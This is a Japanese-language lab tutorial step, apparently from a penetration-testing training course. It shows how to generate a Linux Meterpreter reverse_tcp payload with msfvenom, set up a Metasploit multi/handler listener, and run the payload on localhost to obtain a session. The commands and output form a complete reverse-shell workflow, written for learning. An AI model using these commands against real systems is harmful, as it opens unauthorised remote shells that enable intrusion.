ターゲットで Meterpreter セッションを取得する
このステップでは、システムのクリーンアップを練習する前に、まずシステムにアクセスする必要があります。これは、msfvenomでペイロードを作成し、Metasploit Framework でリスナーを設定し、次に自身のマシンでペイロードを「実行」して、localhostで Meterpreter セッションを取得することでシミュレートします。
まず、ターミナルを開き、msfvenomを使用して Linux Meterpreter ペイロードを生成します。このコマンドは、現在のディレクトリ(~/project)にpayload.elfという名前の実行可能ファイルを作成します。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
ペイロードが正常に生成されたことを示す出力が表示されるはずです。
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf
次に、Metasploit Framework コンソールを開始します。-qフラグは、バナーを表示せずに静かに開始させます。
msfconsole -q
msfconsoleプロンプトに入ったら、ペイロードからの接続をキャッチするためのリスナーを設定する必要があります。exploit/multi/handlerモジュールを使用します。
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
exploit -jコマンドは、リスナーをバックグラウンドジョブとして開始するため、コンソールを引き続き使用できます。ハンドラが開始されたことを示すメッセージが表示されます。
次に、ターミナルウィンドウの+アイコンをクリックして、新しいターミナルタブを開きます。この新しいタブで、ペイロードに実行権限を付与し、実行します。
chmod +x ~/project/payload.elf
~/project/payload.elf
msfconsoleがある最初のターミナルタブに戻ります。Meterpreter セッションが開かれたことを示すメッセージが表示されるはずです。
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400
この新しいセッションと対話するには、sessionsコマンドを使用します。
sessions -i 1
プロンプトがmeterpreter >に変わるはずです。これは、セッションを制御下に置いたことを示しています。